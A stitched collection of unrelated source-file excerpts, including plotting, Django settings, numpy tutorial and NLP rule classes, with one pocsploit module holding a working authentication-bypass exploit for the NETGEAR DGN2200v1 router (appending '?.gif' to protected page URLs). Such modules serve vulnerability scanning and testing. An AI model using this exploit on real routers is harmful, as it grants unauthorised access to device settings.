help='relative path to sequential detail file for vanilla experiments')
parser.add_argument(
'--vanilla_rand_file',
dest='vanilla_rand_file',
required=False,
default='detail-vanilla-rand.txt',
help='relative path to random detail file for vanilla experiments')
parser.add_argument('--kern_log_file',
dest='kern_log_file',
required=False,
default='kern.log',
help='path to kern.log file')
parser.add_argument('--bench_output_dir',
dest="bench_output_dir",
required=False,
default='.',
help='directory containing bench_output_* files')
parser.add_argument('--output_dir',
dest='output_dir',
required=False,
default='output',
help='output directory')
parser.add_argument('--device',
dest='device',
required=False,
help='device name (ex: sdb1)')
csv_fields = ['0', '1', '2'] # CSV header fields used by perf diff graphing script
csv_output = [] # CSV rows for perf diff graphing script
args = parser.parse_args()
path_save = args.output_dir
result_kml = defaultdict(list)
parse_detail_file(result_kml, args.kml_seq_file)
parse_detail_file(result_kml, args.kml_rand_file)
result_vanilla = defaultdict(list)
parse_detail_file(result_vanilla, args.vanilla_seq_file)
parse_detail_file(result_vanilla, args.vanilla_rand_file)
readahead_values = parse_kern_log_file(args.kern_log_file)
# values from /usr/bin/time -v
time_values_kml = defaultdict(list)
time_values_vanilla = defaultdict(list)
for combo in generate_combos():
# TODO don't hardcode sdb1
fn = os.path.join(os.curdir, f'bench_output_{combo[0]}_{combo[1]}_kml')
parse_bench_output(time_values_kml, fn, combo)
fn = os.path.join(os.curdir, f'bench_output_{combo[0]}_{combo[1]}_vanilla')
parse_bench_output(time_values_vanilla, fn, combo)
#TODO sync up time output with detail output? or at least figure out why they differ
if not os.path.exists(os.path.join(os.curdir, path_save)):
os.makedirs(os.path.join(os.curdir, path_save))
# key validation
if set(result_kml.keys()) != set(result_vanilla.keys()):
print('Keys not matching')
print(result_kml.keys())
print(result_vanilla.keys())
exit()
for key in readahead_values.keys():
# second element of tuple is background workload
data = []
data.append(result_kml[key])
data.append(result_kml[tuple(reversed(key))])
data.append(result_vanilla[key])
data.append(result_vanilla[tuple(reversed(key))])
data.append(readahead_values[key])
data.append(time_values_kml[key])
data.append(time_values_kml[tuple(reversed(key))])
data.append(time_values_vanilla[key])
data.append(time_values_vanilla[tuple(reversed(key))])
# Column names
# Calculate average performance difference between vanilla and KML runs
# convert seconds to minutes
# convert ops to kilo ops
for benchmark in BMType:
if benchmark.value < BMType.RA.value:
for i in range(len(data[benchmark.value])):
data[benchmark.value][i][0] /= 60
data[benchmark.value][i][1] /= 1000
elif benchmark.value > BMType.RA.value:
for i in range(len(data[benchmark.value])):
data[benchmark.value][i][0] /= 60
seq_perf_diff = mean([x[1] for x in data[BMType.KML_SEQ.value]]) / mean([x[1] for x in data[BMType.VAN_SEQ.value]])
rand_perf_diff = mean([x[1] for x in data[BMType.KML_RAND.value]]) / mean([x[1] for x in data[BMType.VAN_RAND.value]])
print(*key)
print(f'Sequential perf diff: {seq_perf_diff}\nRandom perf diff: {rand_perf_diff}\n')
# Quick-access Plot Parameters
x_label = 'Time (minutes)'
y_label = 'Throughput (1000s ops/sec)'
y2_label = 'Number of Major Page Faults'
# plot throughput
fig, (seq_axs, rand_axs) = plt.subplots(2)
x, y = zip(*data[BMType.KML_SEQ.value])
seq_axs.plot(x, y)
x, y = zip(*data[BMType.VAN_SEQ.value])
seq_axs.plot(x, y)
seq_maj_axs = seq_axs.twinx()
x, y = find_avg_faults(data[BMType.KML_SEQ_MAJ.value])
seq_maj_axs.plot(x, y, color=(0,1,0))
x, y = find_avg_faults(data[BMType.VAN_SEQ_MAJ.value])
seq_maj_axs.plot(x, y, color=(0,0.5,0.5))
x, y = zip(*data[BMType.KML_RAND.value])
rand_axs.plot(x, y, color=(1,0,0))
x, y = zip(*data[BMType.VAN_RAND.value])
rand_axs.plot(x, y, color=(1,0,1))
rand_maj_axs = rand_axs.twinx()
x, y = find_avg_faults(data[BMType.KML_RAND_MAJ.value])
rand_maj_axs.plot(x, y, color=(0,1,1))
x, y = find_avg_faults(data[BMType.VAN_RAND_MAJ.value])
rand_maj_axs.plot(x, y, color=(0,0,0))
# fix axes limits
seq_axs.set_xlim(0, seq_axs.get_xlim()[1])
rand_axs.set_xlim(0, rand_axs.get_xlim()[1])
seq_axs.set_ylim(0, seq_axs.get_ylim()[1])
rand_axs.set_ylim(0, rand_axs.get_ylim()[1])
#remove border from graphs
seq_axs.spines['top'].set_visible(False)
seq_axs.spines['right'].set_visible(False)
seq_axs.spines['bottom'].set_visible(False)
seq_axs.spines['left'].set_visible(False)
rand_axs.spines['top'].set_visible(False)
rand_axs.spines['right'].set_visible(False)
rand_axs.spines['bottom'].set_visible(False)
rand_axs.spines['left'].set_visible(False)
seq_maj_axs.spines['top'].set_visible(False)
seq_maj_axs.spines['right'].set_visible(False)
seq_maj_axs.spines['bottom'].set_visible(False)
seq_maj_axs.spines['left'].set_visible(False)
rand_maj_axs.spines['top'].set_visible(False)
rand_maj_axs.spines['right'].set_visible(False)
rand_maj_axs.spines['bottom'].set_visible(False)
rand_maj_axs.spines['left'].set_visible(False)
# create legend
labels = []
labels.append(f'{key[0]}_kml')
labels.append(f'{key[0]}_vanilla')
labels.append(f'{key[1]}_kml')
labels.append(f'{key[1]}_vanilla')
#labels.append('readahead')
labels.append(f'{key[0]}_kml_major_faults')
labels.append(f'{key[0]}_vanilla_major_faults')
labels.append(f'{key[1]}_kml_major_faults')
labels.append(f'{key[1]}_vanilla_major_faults')
fig.legend(labels,
loc='upper center',
ncol=2, # Precise legend arrangement...
#bbox_to_anchor=(0, 1.2, 1, .102),
frameon=False) # ...and placement
fig.subplots_adjust(top=0.75, left=0.15)
# fix labels
fig.text(0.5, 0.03, x_label, ha='center', va='center')
fig.text(0.09, 0.49, y_label, ha='center', va='center', rotation='vertical')
fig.text(0.98, 0.5, y2_label, ha='center', va='center', rotation='vertical')
# not sure how to position suptitle properly
#fig.suptitle('Throughput Over Time', fontweight='bold')
# configure ticks
for axis in [seq_axs, rand_axs]:
axis.tick_params(which='both',
bottom=True,
top=False,
left=False,
right=False,
zorder=10) # No tickmarks
axis.yaxis.grid(alpha=.4) # Only left y-axis gridlines
seq_axs.set_xticklabels([])
plt.box(False) # No border or enclosing box part 2
# Save data and figure to CSV and PDF respectively
keytxt = '-'.join(key)
print('saving to', keytxt)
csv_output.append([keytxt, seq_perf_diff, rand_perf_diff])
fig.set_size_inches(9,4) #Set the base size of the figure
plt.savefig(os.path.join(os.curdir, path_save,
f'{keytxt}.pdf'), transparent=True,bbox_inches='tight')
filename = 'perfdiff.csv'
with open(filename, 'w') as f:
writer = csv.writer(f)
writer.writerow(csv_fields)
writer.writerows(csv_output)
|
modules/vulnerabilities/other/netgear-router-auth-bypass.py
|
cckuailong/pocsploit
| 106 |
101787
|
<gh_stars>100-1000
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''NETGEAR DGN2200v1 Router Authentication Bypass''',
"description": '''NETGEAR DGN2200v1 Router does not require authentication if a page has ".jpg", ".gif", or "ess_" substrings, however matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring (e.g., "?.gif").''',
"severity": "high",
"references": [
"https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/",
"https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1"
],
"classification": {
"cvss-metrics": "",
"cvss-score": "",
"cve-id": "",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["netgear", "auth-bypass", "router"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/WAN_wan.htm?.gif"""
method = "GET"
data = """"""
headers = {'Accept': '*/*'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/WAN_wan.htm?.gif"""
method = "GET"
data = """"""
headers = {'Accept': '*/*'}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp1.status_code == 200) and ("""<title>WAN Setup</title>""" in resp1.text):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
|
revise/libs/python/pyste/tests/runtests.py
|
DD-L/deel.boost.python
| 198 |
101810
|
<reponame>DD-L/deel.boost.python
# Copyright <NAME> 2003. Use, modification and
# distribution is subject to the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
#!/usr/bin/python
import sys
sys.path.append('../src/Pyste')
import unittest
import os.path
from glob import glob
if __name__ == '__main__':
loader = unittest.defaultTestLoader
tests = []
for name in glob('*UT.py'):
module = __import__(os.path.splitext(name)[0])
tests.append(loader.loadTestsFromModule(module))
runner = unittest.TextTestRunner()
result = runner.run(unittest.TestSuite(tests))
sys.exit(not result.wasSuccessful())
|
web/iosblog/settings.py
|
mrscorpion/MSEasyReader
| 519 |
101811
|
<filename>web/iosblog/settings.py<gh_stars>100-1000
"""
Django settings for iosblog project.
Generated by 'django-admin startproject' using Django 1.9.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
if 'IOSBLOGRUNMODE' in os.environ:
RUNMODE = os.environ['IOSBLOGRUNMODE']
else:
RUNMODE = 'develop'
if RUNMODE == 'production':
DEBUG = False
with open('/etc/iosblog/secret_key.txt') as f:
SECRET_KEY = f.read().strip()
else:
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = <KEY>'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['.iosblog.cc']
# Application definition
INSTALLED_APPS = [
'x123.apps.X123Config',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'oauth2_provider',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'iosblog.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'iosblog.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'OPTIONS': {
'read_default_file': os.path.join(BASE_DIR, 'db.cnf')
}
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'zh-cn'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
],
'PAGE_SIZE': 20,
'DEFAULT_AUTHENTICATION_CLASSES': (
'oauth2_provider.ext.rest_framework.OAuth2Authentication',
)
}
STATIC_ROOT= '/var/www/iosblog/static'
MEDIA_ROOT = '/var/www/iosblog/media'
if DEBUG:
MEDIA_URL = '/media/'
else:
MEDIA_URL = 'http://iosblog.cc/media/'
|
test/numbers/complex1.py
|
kylebarron/MagicPython
| 1,482 |
101815
|
3.14j
10.j
10j
.001j
1e100j
3.14e-10j
3.14 : constant.numeric.float.python, source.python
j : constant.numeric.float.python, source.python, storage.type.imaginary.number.python
10. : constant.numeric.float.python, source.python
j : constant.numeric.float.python, source.python, storage.type.imaginary.number.python
10 : constant.numeric.dec.python, source.python
j : constant.numeric.dec.python, source.python, storage.type.imaginary.number.python
.001 : constant.numeric.float.python, source.python
j : constant.numeric.float.python, source.python, storage.type.imaginary.number.python
1e100 : constant.numeric.float.python, source.python
j : constant.numeric.float.python, source.python, storage.type.imaginary.number.python
3.14e-10 : constant.numeric.float.python, source.python
j : constant.numeric.float.python, source.python, storage.type.imaginary.number.python
|
megatron/text_generation_server.py
|
zhisbug/Megatron-LM
| 2,869 |
101816
|
<gh_stars>1000+
# coding=utf-8
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import torch
import json
import threading
from flask import Flask, request, jsonify, current_app
from flask_restful import Resource, Api
from megatron import get_args
from megatron import mpu
from megatron.text_generation_utils import generate
GENERATE_NUM = 0
lock = threading.Lock()
class MegatronGenerate(Resource):
def __init__(self, model):
self.model = model
@staticmethod
def send_do_generate():
choice = torch.cuda.LongTensor([GENERATE_NUM])
torch.distributed.broadcast(choice, 0)
def put(self):
args = get_args()
print("request IP: " + str(request.remote_addr))
print(json.dumps(request.get_json()),flush=True)
print("current time: ", datetime.datetime.now())
sentences = request.get_json()["sentences"]
if len(sentences) > 128:
return "Maximum number of sentences is 128", 400
tokens_to_generate = 64 # Choosing hopefully sane default. Full sequence is slow
if "tokens_to_generate" in request.get_json():
tokens_to_generate = request.get_json()["tokens_to_generate"]
if not isinstance(tokens_to_generate, int):
return "tokens_to_generate must be an integer greater than 0"
if tokens_to_generate < 1:
return "tokens_to_generate must be an integer greater than 0"
all_probs = False
if "all_probs" in request.get_json():
all_probs = request.get_json()["all_probs"]
if not isinstance(all_probs, bool):
return "all_probs must be a boolean value"
temperature = args.temperature
if "temperature" in request.get_json():
temperature = request.get_json()["temperature"]
if not (type(temperature) == int or type(temperature) == float):
return "temperature must be a positive number less than or equal to 100.0"
if not (0.0 < temperature <= 100.0):
return "temperature must be a positive number less than or equal to 100.0"
add_BOS = False
if "add_BOS" in request.get_json():
add_BOS = request.get_json()["add_BOS"]
if not isinstance(add_BOS, bool):
return "add_BOS must be a boolean value"
with lock: # Need to get lock to keep multiple threads from hitting code
MegatronGenerate.send_do_generate() # Tell other ranks we're doing generate
resp_sentences, resp_sentences_seg, output_logits, full_logits, tokens = generate(self.model, sentences, tokens_to_generate, all_probs, temperature, add_BOS)
if all_probs:
return jsonify({"sentences": resp_sentences,
"segments": resp_sentences_seg,
"logits": output_logits,
"all_logits": full_logits,
"tokens": tokens})
return jsonify({"sentences": resp_sentences,
"segments": resp_sentences_seg,
"logits": output_logits})
class MegatronServer(object):
def __init__(self, model):
self.app = Flask(__name__, static_url_path='')
api = Api(self.app)
api.add_resource(MegatronGenerate, '/generate', resource_class_args=[model])
def run(self, url):
self.app.run(url, threaded=True, debug=False)
|
butterflow/version.py
|
changhaitravis/butterflow
| 1,340 |
101817
|
__version__ = '0.2.4a4'
|
notebook/numpy_fancy_indexing.py
|
vhn0912/python-snippets
| 174 |
101827
|
import numpy as np
a = np.arange(10) * 10
print(a)
# [ 0 10 20 30 40 50 60 70 80 90]
print(a[5])
# 50
print(a[8])
# 80
print(a[[5, 8]])
# [50 80]
print(a[[5, 4, 8, 0]])
# [50 40 80 0]
print(a[[5, 5, 5, 5]])
# [50 50 50 50]
idx = np.array([[5, 4], [8, 0]])
print(idx)
# [[5 4]
# [8 0]]
print(a[idx])
# [[50 40]
# [80 0]]
# print(a[[[5, 4], [8, 0]]])
# IndexError: too many indices for array
print(a[[[[5, 4], [8, 0]]]])
# [[50 40]
# [80 0]]
a_2d = np.arange(12).reshape((3, 4))
print(a_2d)
# [[ 0 1 2 3]
# [ 4 5 6 7]
# [ 8 9 10 11]]
print(a_2d[0])
# [0 1 2 3]
print(a_2d[2])
# [ 8 9 10 11]
print(a_2d[[2, 0]])
# [[ 8 9 10 11]
# [ 0 1 2 3]]
print(a_2d[[2, 2, 2]])
# [[ 8 9 10 11]
# [ 8 9 10 11]
# [ 8 9 10 11]]
print(a_2d[:, 1])
# [1 5 9]
print(a_2d[:, 3])
# [ 3 7 11]
print(a_2d[:, 1:2])
# [[1]
# [5]
# [9]]
print(a_2d[:, [3, 1]])
# [[ 3 1]
# [ 7 5]
# [11 9]]
print(a_2d[:, [3, 3, 3]])
# [[ 3 3 3]
# [ 7 7 7]
# [11 11 11]]
print(a_2d[0, 1])
# 1
print(a_2d[2, 3])
# 11
print(a_2d[[0, 2], [1, 3]])
# [ 1 11]
# index
# [[0, 1] [2, 3]]
# print(a_2d[[0, 2, 1], [1, 3]])
# IndexError: shape mismatch: indexing arrays could not be broadcast together with shapes (3,) (2,)
print(a_2d[[[0, 0], [2, 2]], [[1, 3], [1, 3]]])
# [[ 1 3]
# [ 9 11]]
# index
# [[0, 1] [0, 3]
# [2, 1] [2, 3]]
print(a_2d[[[0], [2]], [1, 3]])
# [[ 1 3]
# [ 9 11]]
idxs = np.ix_([0, 2], [1, 3])
print(idxs)
# (array([[0],
# [2]]), array([[1, 3]]))
print(type(idxs))
# <class 'tuple'>
print(type(idxs[0]))
# <class 'numpy.ndarray'>
print(idxs[0])
# [[0]
# [2]]
print(idxs[1])
# [[1 3]]
print(a_2d[np.ix_([0, 2], [1, 3])])
# [[ 1 3]
# [ 9 11]]
print(a_2d[np.ix_([2, 0], [3, 3, 3])])
# [[11 11 11]
# [ 3 3 3]]
print(a_2d[[0, 2]][:, [1, 3]])
# [[ 1 3]
# [ 9 11]]
a_2d = np.arange(12).reshape((3, 4))
print(a_2d)
# [[ 0 1 2 3]
# [ 4 5 6 7]
# [ 8 9 10 11]]
a_2d[np.ix_([0, 2], [1, 3])] = 100
print(a_2d)
# [[ 0 100 2 100]
# [ 4 5 6 7]
# [ 8 100 10 100]]
a_2d[np.ix_([0, 2], [1, 3])] = [100, 200]
print(a_2d)
# [[ 0 100 2 200]
# [ 4 5 6 7]
# [ 8 100 10 200]]
a_2d[np.ix_([0, 2], [1, 3])] = [[100, 200], [300, 400]]
print(a_2d)
# [[ 0 100 2 200]
# [ 4 5 6 7]
# [ 8 300 10 400]]
print(a_2d[[0, 2]][:, [1, 3]])
# [[100 200]
# [300 400]]
a_2d[[0, 2]][:, [1, 3]] = 0
print(a_2d)
# [[ 0 100 2 200]
# [ 4 5 6 7]
# [ 8 300 10 400]]
a_2d = np.arange(12).reshape((3, 4))
print(a_2d)
# [[ 0 1 2 3]
# [ 4 5 6 7]
# [ 8 9 10 11]]
a_2d[[2, 0]] = [[100, 200, 300, 400], [500, 600, 700, 800]]
print(a_2d)
# [[500 600 700 800]
# [ 4 5 6 7]
# [100 200 300 400]]
a_2d[[2, 2]] = [[-1, -2, -3, -4], [-5, -6, -7, -8]]
print(a_2d)
# [[500 600 700 800]
# [ 4 5 6 7]
# [ -5 -6 -7 -8]]
a_2d = np.arange(12).reshape((3, 4))
print(a_2d)
# [[ 0 1 2 3]
# [ 4 5 6 7]
# [ 8 9 10 11]]
a_fancy = a_2d[np.ix_([0, 2], [1, 3])]
print(a_fancy)
# [[ 1 3]
# [ 9 11]]
a_fancy[0, 0] = 100
print(a_fancy)
# [[100 3]
# [ 9 11]]
print(a_2d)
# [[ 0 1 2 3]
# [ 4 5 6 7]
# [ 8 9 10 11]]
a_2d = np.arange(12).reshape((3, 4))
print(a_2d)
# [[ 0 1 2 3]
# [ 4 5 6 7]
# [ 8 9 10 11]]
print(a_2d[[2, 0], ::-1])
# [[11 10 9 8]
# [ 3 2 1 0]]
print(a_2d[::2, [3, 0, 1]])
# [[ 3 0 1]
# [11 8 9]]
|
predpatt/rules.py
|
spyysalo/PredPatt
| 114 |
101834
|
from __future__ import print_function
class Rule(object):
def __init__(self):
pass
def __repr__(self):
return self.name()
@classmethod
def name(cls):
return cls.__name__.split('.')[-1]
@classmethod
def explain(cls):
return cls.__doc__
def __cmp__(self, other):
return cmp(unicode(self), unicode(other))
class PredicateRootRule(Rule):
rule_type = 'predicate_root'
class ArgumentRootRule(Rule):
rule_type = 'argument_root'
class PredConjRule(Rule):
type = 'predicate_conj'
class ArgumentResolution(Rule):
type = 'argument_resolution'
class ConjunctionResolution(Rule):
type = 'conjunction_resolution'
class SimplifyRule(Rule):
type = 'simple'
#______________________________________________
# Predicate root identification
class a1(PredicateRootRule):
"Extract a predicate token from the dependent of clausal relation {ccomp, csub, csubjpass}."
rule_type = 'predicate_root'
class a2(PredicateRootRule):
"Extract a predicate token from the dependent of clausal complement 'xcomp'."
rule_type = 'predicate_root'
class b(PredicateRootRule):
"Extract a predicate token from the dependent of clausal modifier."
rule_type = 'predicate_root'
class c(PredicateRootRule):
"Extract a predicate token from the governor of the relations {nsubj, nsubjpass, dobj, iobj, ccomp, xcomp, advcl}."
rule_type = 'predicate_root'
def __init__(self, e):
super(c, self).__init__()
self.e = e
def __repr__(self):
return "add_root(%s)_for_%s_from_(%s)" % (self.e.gov, self.e.rel, self.e.dep)
class d(PredicateRootRule):
"Extract a predicate token from the dependent of apposition."
rule_type = 'predicate_root'
class e(PredicateRootRule):
"Extract a predicate token from the dependent of an adjectival modifier."
rule_type = 'predicate_root'
class v(PredicateRootRule):
"Extract a predicate token from the dependent of the possessive relation 'nmod:poss' (English specific)."
rule_type = 'predicate_root'
class f(PredicateRootRule):
"Extract a conjunct token of a predicate token."
rule_type = 'predicate_root'
#_________________________________________
# Argument root identification
class g1(ArgumentRootRule):
"Extract an argument token from the dependent of the following relations {nsubj, nsubjpass, dobj, iobj}."
def __init__(self, edge):
self.edge = edge
super(g1, self).__init__()
def __repr__(self):
return 'g1(%s)' % (self.edge.rel)
class h1(ArgumentRootRule):
"Extract an argument token, which directly depends on the predicate token, from the dependent of the relations {nmod, nmod:npmod, nmod:tmod}."
class h2(ArgumentRootRule):
"Extract an argument token, which indirectly depends on the predicate token, from the dependent of the relations {nmod, nmod:npmod, nmod:tmod}."
class i(ArgumentRootRule):
"Extract an argument token from the governor of an adjectival modifier."
class j(ArgumentRootRule):
"Extract an argument token from the governor of apposition."
class w1(ArgumentRootRule):
"Extract an argument token from the governor of 'nmod:poss' (English specific)."
class w2(ArgumentRootRule):
"Extract an argument token from the dependent of 'nmod:poss' (English specific)."
class k(ArgumentRootRule):
"Extract an argument token from the dependent of the dependent of clausal complement 'ccomp'."
#__________________________________
# Predicate conjunction resolution
class pred_conj_borrow_aux_neg(PredConjRule):
"Borrow aux and neg tokens from conjoined predicate's name."
def __init__(self, friend, borrowed_token):
super(pred_conj_borrow_aux_neg, self).__init__()
self.friend = friend
self.borrowed_token = borrowed_token
class pred_conj_borrow_tokens_xcomp(PredConjRule):
"Borrow tokens from xcomp in a conjunction or predicates."
def __init__(self, friend, borrowed_token):
super(pred_conj_borrow_tokens_xcomp, self).__init__()
self.friend = friend
self.borrowed_token = borrowed_token
class cut_borrow_other(ArgumentResolution):
def __init__(self, borrowed, friend):
super(cut_borrow_other, self).__init__()
self.friend = friend
self.borrowed = borrowed
class cut_borrow_subj(ArgumentResolution):
def __init__(self, subj, friend):
super(cut_borrow_subj, self).__init__()
self.friend = friend
self.subj = subj
def __repr__(self):
return 'cut_borrow_subj(%s)_from(%s)' % (self.subj.root, self.friend.root)
class cut_borrow_obj(ArgumentResolution):
def __init__(self, obj, friend):
super(cut_borrow_obj, self).__init__()
self.friend = friend
self.obj = obj
def __repr__(self):
return 'cut_borrow_obj(%s)_from(%s)' % (self.obj.root, self.friend.root)
class borrow_subj(ArgumentResolution):
"Borrow subject from governor in (conj, xcomp of conj root, and advcl)."
# if gov_rel=='conj' and missing a subject, try to borrow the subject from
# the other event. Still no subject. Try looking at xcomp of conjunction
# root.
#
# if gov_rel==advcl and not event.has_subj() then borrow from governor.
def __init__(self, subj, friend):
super(borrow_subj, self).__init__()
self.subj = subj
self.friend = friend
def __repr__(self):
return 'borrow_subj(%s)_from(%s)' % (self.subj.root, self.friend.root)
# return 'borrow_subj(%s,%s,%s,%s)' % (self.i, self.event.root, self.friend.root, self.event.root.gov_rel)
# return 'borrow_subj(%s,%s)' % (self.friend, self.friend.subj())
class borrow_obj(ArgumentResolution):
"Borrow subject from governor in (conj, xcomp of conj root, and advcl)."
# if gov_rel=='conj' and missing a subject, try to borrow the subject from
# the other event. Still no subject. Try looking at xcomp of conjunction
# root.
#
# if gov_rel==advcl and not event.has_subj() then borrow from governor.
def __init__(self, obj, friend):
super(borrow_obj, self).__init__()
self.obj = obj
self.friend = friend
def __repr__(self):
return 'borrow_obj(%s)_from(%s)' % (self.obj.root, self.friend.root)
class share_argument(ArgumentResolution):
"Create an argument sharing tokens with another argument."
#___________________________
# Relative clause
class arg_resolve_relcl(ArgumentResolution):
"""Resolve argument of a predicate inside a relative clause. The missing
argument that we take is rooted at the governor of the `acl` dependency
relation (type acl:*) pointing at the embedded predicate.
"""
class pred_resolve_relcl(ArgumentResolution):
"Predicate has an argument from relcl resolution (`arg_resolve_relcl`)."
#__________________________________________
# Rules for post added argument root token.
class l(ArgumentResolution):
"Merge the argument token set of xcomp's dependent to the argument token set of the real predicate token."
class m(ConjunctionResolution):
"Extract a conjunct token of the argument root token."
#_________________________________________
# Predicate phrase
class PredPhraseRule(Rule):
type = 'pred_phrase'
def __init__(self, x):
self.x = x
super(PredPhraseRule, self).__init__()
# def __repr__(self):
# return '%s(%s)' % (super(PredPhraseRule, self).__repr__(), self.x)
class n1(PredPhraseRule):
"Extract a token from the subtree of the predicate root token, and add it to the predicate phrase."
class n6(PredPhraseRule):
"Add a case phrase to the predicate phrase."
class n2(PredPhraseRule):
"Drop a token, which is an argument root token, from the subtree of the predicate root token."
class n3(PredPhraseRule):
"Drop a token, which is another predicate root token, from the subtree of the predicate root token."
class n4(PredPhraseRule):
"Drop a token, which is the dependent of the relations set {ccomp, csubj, advcl, acl, acl:relcl, nmod:tmod, parataxis, appos, dep}, from the subtree of the predicate root token."
class n5(PredPhraseRule):
"Drop a token, which is a conjunct of the predicate root token or a conjunct of a xcomp's dependent token, from the subtree of the predicate root token."
#______________________________________
# Rules for extracting argument phrase.
class ArgPhraseRule(Rule):
type = 'arg_phrase'
class clean_arg_token(ArgPhraseRule):
"Extract a token from the subtree of the argument root token, and add it to the argument phrase."
def __init__(self, x):
super(clean_arg_token, self).__init__()
self.x = x
def __repr__(self):
return "clean_arg_token(%s)" %(self.x)
class move_case_token_to_pred(ArgPhraseRule):
"Extract a case token from the subtree of the argument root token."
def __init__(self, x):
super(move_case_token_to_pred, self).__init__()
self.x = x
def __repr__(self):
return "move_case_token(%s)_to_pred" %(self.x)
class predicate_has(ArgPhraseRule):
"Drop a token, which is a predicate root token, from the subtree of the argument root token."
def __init__(self, x):
super(predicate_has, self).__init__()
self.x = x
def __repr__(self):
return "predicate_has(%s)" %(self.x)
class drop_appos(ArgPhraseRule):
def __init__(self, x):
super(drop_appos, self).__init__()
self.x = x
def __repr__(self):
return "drop_appos(%s)" %(self.x)
class drop_unknown(ArgPhraseRule):
def __init__(self, x):
super(drop_unknown, self).__init__()
self.x = x
def __repr__(self):
return "drop_unknown(%s)" %(self.x)
class drop_cc(ArgPhraseRule):
"Drop the argument's cc (coordinating conjunction) from the subtree of the argument root token."
def __init__(self, x):
super(drop_cc, self).__init__()
self.x = x
def __repr__(self):
return "drop_cc(%s)" %(self.x)
class drop_conj(ArgPhraseRule):
"Drop the argument's conjuct from the subtree of the argument root token."
def __init__(self, x):
super(drop_conj, self).__init__()
self.x = x
def __repr__(self):
return "drop_conj(%s)" %(self.x)
class special_arg_drop_direct_dep(ArgPhraseRule):
def __init__(self, x):
super(special_arg_drop_direct_dep, self).__init__()
self.x = x
def __repr__(self):
return "special_arg_drop_direct_dep(%s)" %(self.x)
class embedded_advcl(ArgPhraseRule):
def __init__(self, x):
super(embedded_advcl, self).__init__()
self.x = x
def __repr__(self):
return "drop_embedded_advcl(%s)" %(self.x)
class embedded_ccomp(ArgPhraseRule):
def __init__(self, x):
super(embedded_ccomp, self).__init__()
self.x = x
def __repr__(self):
return "drop_embedded_ccomp(%s)" %(self.x)
class embedded_unknown(ArgPhraseRule):
def __init__(self, x):
super(embedded_unknown, self).__init__()
self.x = x
def __repr__(self):
return "drop_embedded_unknown(%s)" %(self.x)
#________________________________
# Rules for simple predicate.
class p1(SimplifyRule):
